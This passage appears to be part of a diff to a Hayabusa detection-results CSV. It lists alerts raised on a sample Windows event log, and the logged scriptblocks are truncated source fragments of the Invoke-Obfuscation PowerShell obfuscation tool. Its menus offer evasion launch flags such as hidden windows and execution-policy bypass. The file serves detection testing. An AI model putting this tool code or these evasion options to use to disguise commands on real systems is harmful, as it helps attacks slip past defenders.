+= , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. $TutorialInputOptions = @(@('tutorial') , ""<Tutorial> of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this <Help> Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , ""<Show options> for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , ""<Clear> screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , ""<Copy> ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand <Out> to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , ""<Execute> ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , ""<Reset> ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , ""<Undo> LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go <Back> to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , ""<Quit> Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to <Home> Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random <ASCII> art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. $AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. $AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. $TutorialInputOptions = @(@('tutorial') , ""<Tutorial> of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this <Help> Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , ""<Show options> for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , ""<Clear> screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , ""<Copy> ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand <Out> to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , ""<Execute> ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , ""<Reset> ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , ""<Undo> LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go <Back> to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , ""<Quit> Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to <Home> Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random <ASCII> art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. $AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. $AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { 